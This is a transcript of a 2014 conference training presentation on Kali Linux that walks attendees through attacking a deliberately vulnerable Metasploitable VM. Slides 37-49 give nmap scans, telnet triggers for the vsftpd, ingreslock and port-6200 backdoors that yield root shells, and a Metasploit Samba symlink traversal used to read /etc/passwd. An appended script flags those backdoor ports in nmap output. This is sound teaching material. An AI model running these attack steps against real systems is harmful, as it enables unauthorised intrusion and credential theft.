
Kali Linux

Kali Linux. Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge. Welcome – Salt Fork 2014.

corbettr

Presentation Transcript


  1. Kali Linux: Presentation on Kali Linux, Ohio HTCIA 2014 Spring Conference, Salt Fork Lodge

  2. Welcome – Salt Fork 2014

  3. Welcome: Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.

  4. Who or What is ‘Kali’?

  5. Who is Kali? “Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!” (Anu Yadavalli)

  6. Hindu Kali

  7. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

  8. What’s on the DVD? /books: Official Kali Guide, eForensics • /media: 7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager • /metaspolitable • /PPT

  9. http://www.kali.org/

  10. Legend (slide icons): We’re going to type something • We’re going to make a note • Might be a question? • We’re going to click on something • Recon • Attack

  11. Ready?

  12. Use your powers for good

  13. Getting Ready… Let’s make a folder called kali_2014 • Copy the DVD contents into that folder • Install 7-Zip • Install VMware Player • Let’s make sure the virtual environments are working and can ‘ping’ each other

  14. VMware Player: Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

  15. Logins / Passwords: Kali Login root • Kali Password password • Metasploitable Login msfadmin • Metasploitable Password msfadmin

  16. Login msfadmin • Password msfadmin ifconfig • Jot down the IP & Netmask route • Jot down the Gateway Metaspolitable V/E

  17. Metasploitable V/E: Virtual Environment #1 • Metasploitable • Go to TERMINAL • rlogin -l root <IP Address> • cd /tmp • ls -l ...vs... ls -la • rm .X0-lock → startx

  18. Login root • Password password  ifconfig • Jot down the IP & Netmask  route • Jot down the Gateway Kali V/E

  19. Kali V/E: Go to: Applications → System Tools → Preferences → System Settings → Display → Resolution: ____ Then… [Apply]

  20. Kali Updating: From the command line, type: apt-get update && apt-get upgrade • Note: This has already been done to save time, but should be done after a new installation.

  21. Are we good?

  22. There are several categories: Top 10 Security Tools • Information Gathering • Vulnerability Analysis • Web Applications • Password Attacks • Wireless Attacks • Exploitation Tools • Sniffing/Spoofing • Maintaining Access • Reverse Engineering • Stress Testing • Hardware Hacking • Forensics • Reporting Tools • System Services

  23. Metapackages also exist

  24. Command Line Tools Presentation on Kali Linux

  25. ping: Packet InterNet Groper • Port = 8 • Establishes physical connectivity between two entities • (from Kali) ping <Target IP> • Did it echo back?

  26. top: Tells us what services are running, processes, memory allocation. Basically, a live system monitor.

  27. df: Tells us how much space is available or ‘disk free’.

  28. du: Tells us how much space is taken or ‘disk used’. You can get a shorter report by… → ‘du -s’ … (disk used - summary)

  29. free: How much ‘free’ memory is available.

  30. ls: This is for ‘list’ • ls -l (list - long) • ls -la (list - long - all attributes)

  31. pwd: Directory structure • Means ‘path to working directory’ or ‘print working directory’

  32. ps / ps aux / pstree: ps • Means ‘Process Status’ • aux – auxiliary view • pstree – shows parent/child relationships • Windows – tasklist / taskkill • kill – stops a process (ex: kill PID)

  33. Both Environments Presentation on Kali Linux

  34. Can you ‘ping’ each other? Virtual Environment #1 (Metasploitable) • Go to TERMINAL • ifconfig • …jot this number down… • Virtual Environment #2 (Kali) • Go to TERMINAL • ifconfig • …jot this number down…

  35. CLI & Services Presentation on Kali Linux

  36. traceroute: Essentially, ‘tracert’ in Windows • traceroute -i eth0 <Target IP> • It displays the route (path) and measures transit delays of packets across an Internet Protocol (IP) network.

  37. nmap: nmap -p0-65535 <Target IP> | less • A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network.

  38. nmap: nmap -sS -Pn -A <Target IP> • A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

  39. rlogin (from Metasploitable): rlogin -l root <Target IP> • whoami • tcpdump -i eth0 host <Target IP> • A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

  40. rpcinfo: rpcinfo -p <Target IP> • A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

  41. showmount: showmount -e <Target IP> • showmount -a <Target IP> • It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.

  42. telnet: telnet <Target IP> 21 • After '220...', user backdoored:) • <CTRL><]> • quit • Port 20/21 is FTP

  43. telnet: telnet <Target IP> 6200 • After 'Escape character...', id; • <CTRL><]> • quit • Port 6200 - Oracle Notification Service remote port Oracle Application Server

  44. telnet: telnet <Target IP> 6667 • IRC (Internet Relay Chat) • Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm, ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.

  45. telnet: telnet <Target IP> 1524 • After 'root@meta....', id • Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.

  46. Are we good?

  47. smbclient: smbclient -L //<Target IP> • msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal • set RHOST <Target IP> • set SMBSHARE tmp

  48. smbclient: exploit • ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... • At the prompt, type exit

  49. smbclient: smbclient //<Target IP>/tmp • Do you get the 'smb: \>' prompt? • cd rootfs • cd etc • more passwd • Do you get a list of all user accts?
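
For slides 37 and 42 to 45: the slides check ports 21, 6200, 6667 and 1524 one telnet session at a time; the script below is an added example (not part of the presentation) that reads nmap grepable output and reports which of those ports are open on each lab host. The function names, the watchlist wording and the sample scan lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the slides): report open ports from slides 42-45
# found in nmap grepable (-oG) output. Reads a file argument or stdin.

# port=note pairs; ports and wording come from slides 42-45.
WATCHLIST='21=FTP control port (slide 42);6200=port probed on slide 43;6667=IRC, also used by many trojans/backdoors (slide 44);1524=ingreslock, backdoor shell port (slide 45)'

flag_listeners() {
  awk -v watch="$WATCHLIST" '
    BEGIN {
      n = split(watch, rows, ";")
      for (i = 1; i <= n; i++) {
        eq = index(rows[i], "=")
        note[substr(rows[i], 1, eq - 1)] = substr(rows[i], eq + 1)
      }
    }
    /Ports: / {
      host = $2                       # "Host: <addr> (<name>) ..."
      line = $0
      sub(/.*Ports: /, "", line)      # keep only the port list
      sub(/\t.*/, "", line)           # drop "Ignored State: ..." if present
      m = split(line, entry, ", ")
      for (j = 1; j <= m; j++) {
        split(entry[j], f, "/")       # port/state/proto/owner/service/...
        if (f[2] == "open" && (f[1] in note))
          printf "%s %s/%s %s - %s\n", host, f[1], f[3], f[5], note[f[1]]
      }
    }
  ' "$@"
}

# Constructed sample scan output (documentation addresses, not real hosts).
sample_scan() {
  printf 'Host: 192.0.2.10 ()\tStatus: Up\n'
  printf 'Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 1524/open/tcp//ingreslock///, 6667/filtered/tcp//irc///\tIgnored State: closed (65532)\n'
  printf 'Host: 192.0.2.20 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\n'
}

sample_scan | flag_listeners
```

For a real lab scan, save the slide 37 run with nmap's -oG option and pass that file name to flag_listeners; only ports in the open state are reported.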
